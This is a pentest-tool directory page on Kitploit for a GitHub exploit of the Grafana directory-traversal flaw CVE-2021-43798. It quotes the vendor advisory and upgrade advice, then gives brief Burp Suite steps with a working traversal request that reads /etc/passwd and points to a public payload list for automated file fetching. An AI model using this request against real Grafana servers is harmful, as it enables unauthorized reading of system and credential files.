Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-43798 — Exploit for Grafana directory traversal (CVE-2021-43798) with Burp Suite integration and payload automation for accessing local files on vulnerable instances. | Kitploit
Tools/GitHubGitHub/iris288/cve-2021-43798
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubiris288/cve-2021-43798

CVE-2021-43798

Exploit for Grafana directory traversal (CVE-2021-43798) with Burp Suite integration and payload automation for accessing local files on vulnerable instances.

View Repository
2 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-43798

Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files

Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: <grafana_host_url>/public/plugins//, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.

Using Burp Suite

Send GET to repeater

GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1

Then send to intruder GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1

Using Sniper to ATTACK Payload copy from github https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal

Paypload processing Match [{FILE]} replace with {flag.txt}

Download Tool